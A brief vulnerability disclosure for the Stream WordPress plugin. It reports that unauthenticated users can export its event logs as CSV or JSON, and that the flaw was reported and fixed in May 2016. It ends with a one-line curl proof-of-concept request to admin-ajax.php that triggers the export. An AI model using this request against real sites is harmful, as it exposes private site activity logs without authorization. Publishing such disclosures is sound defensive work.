The Stream WordPress plugin allows unauthenticated users to export CSV or JSON of recent events. The code only checks to see if the proper GET variables are passed to a valid backend WordPress handler and will happily export logged entries. Reported to maintainers on 5/25/2016 and new version released 5/30/2016
curl -i -X POST -H “Content-Type:application/x-www-form-urlencoded” -d “action=nonexistingaction” ‘http://example.com/wordpress/wp-admin/admin-ajax.php?page=wp_stream&record-actions;=export-json’